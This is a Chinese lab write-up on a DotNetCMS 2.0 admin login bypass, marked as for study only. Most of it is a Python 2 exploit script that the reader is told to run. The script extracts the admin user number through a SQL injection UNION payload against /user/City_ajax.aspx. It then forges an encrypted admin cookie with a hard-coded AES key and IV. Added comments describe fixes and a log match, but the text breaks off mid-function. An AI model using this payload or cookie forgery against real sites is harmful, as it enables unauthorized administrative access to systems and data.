【实验环境】仅供学习参考
信息收集
登录目标网站并收集信息
通过查看页面源码,发现cms版本信息为:DotNetCMS 2.0,通过上网查询可以找到该cms存在的漏洞,并进行复现
登录绕过漏洞
网站后台地址:/manage/Index.aspx
1)将代码写入exp.py文件中运行,即可得到cookie
代码如下:
#coding:utf-8
# Exploit script from the DotNetCMS 2.0 write-up above (Python 2 code: print
# statements, urllib.urlopen). Read defensively, it chains two weaknesses:
# a SQL injection in a request that carries no session (get_usernumber) and
# forgery of an AES-encrypted login cookie under a fixed key/IV
# (generate_cookie); the result is handed to write_cookie, which is not part
# of this excerpt.
import argparse
import urllib
import traceback
import base64
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex

# Static key and IV as quoted on this page. The page does not say where they
# come from; presumably they are fixed values the product uses for its login
# cookie -- TODO confirm. A fixed, product-wide secret makes the cookie
# forgeable by anyone who has it; the mitigation is a per-deployment secret
# (or server-side sessions) plus an integrity check (MAC) on the cookie.
# Both strings are 64 characters; how they are cut down to AES key/IV length
# happens in generate_cookie, whose body is cut off at the end of this page.
KEY = 'Guz(%&hj7x89H$yuBI0456FtmaT5&fvHUFCy76*h%(HilJ$lhj!y6&(*jkP87jH7'
IV = 'E4ghj*Ghg7!rNIfb&95GUY86GfghUb#er57HBh(u%g6HJ($jhWk7&!hg4ui%$hjk'


def parse_args():
    """Parse the command line: ``-u/--url`` (required, one or more values).

    ``nargs="+"`` means ``args.url`` is always a list, even for one URL.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="the url", required=True, nargs="+")
    return parser.parse_args()


def run(url):
    """Run the full chain against one base ``url``.

    Any exception (network error, marker missing from the response, ...) is
    printed with a traceback and swallowed, so one failing URL does not stop
    the caller.
    """
    try:
        usernumber = get_usernumber(url)
        if usernumber is not None:
            encrypt_cookie = generate_cookie(usernumber)
            # write it into the cookie (write_cookie is not in this excerpt)
            write_cookie(url, encrypt_cookie)
    except Exception:
        traceback.print_exc()


def get_usernumber(url):
    """Read the admin's ``UserNum`` via SQL injection in ``/user/City_ajax.aspx``.

    Relies on the server concatenating the ``CityId`` query parameter into
    its SQL: the injected UNION makes the returned ``<option>`` values carry
    ``UserNum`` for the ``admin`` row of ``dbo.fs_sys_User``. Returns the
    extracted value, or ``None`` when the marker is not found.

    Defensive notes: the server-side fix is a parameterised query for
    ``CityId`` (with a numeric cast, since it is an id). For detection, the
    literal ``' union all select`` inside the ``CityId`` parameter of this
    endpoint is a simple log/WAF match.
    """
    fullurl = url + "/user/City_ajax.aspx?CityId=1' union all select UserNum,UserNum from dbo.fs_sys_User where UserName='admin"
    content = urllib.urlopen(fullurl).read()
    # NOTE: str.index raises ValueError when the marker is absent instead of
    # returning -1, so the ``else`` branch below is never taken; the error
    # propagates to run()'s handler instead.
    index = content.index("<option value=\"")
    if index != -1:
        usernumber = content[index+15:]  # 15 == len('<option value="')
        usernumber = usernumber[0: content.index("\"")+1]
        print "Get usernumber success. Usernumber is :", usernumber
        return usernumber
    else:
        print "Get usernumber fail"
        return None


def pkcs7padding(data):
    """Pad ``data`` to a multiple of ``AES.block_size`` (PKCS#7).

    Always appends at least one byte: ``padding`` bytes each of value
    ``padding`` (a full block when the input is already aligned).
    """
    bs = AES.block_size
    padding = bs - len(data) % bs
    padding_text = chr(padding) * padding
    return data + padding_text


# Builds the cookie plaintext "<usernumber>,admin,0,1,False" and encrypts it
# with KEY/IV; the meaning of the numeric/boolean fields is not visible here
# and the body continues below, cut off by the end of this excerpt.
def generate_cookie(usernumber):
orgstr = "%s,admin,0,1,False"%(usernumber,)
cryptor = AES.new(